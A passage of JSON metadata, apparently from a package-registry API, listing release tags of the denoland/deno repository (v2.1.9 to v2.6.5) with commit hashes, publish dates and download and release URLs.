@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2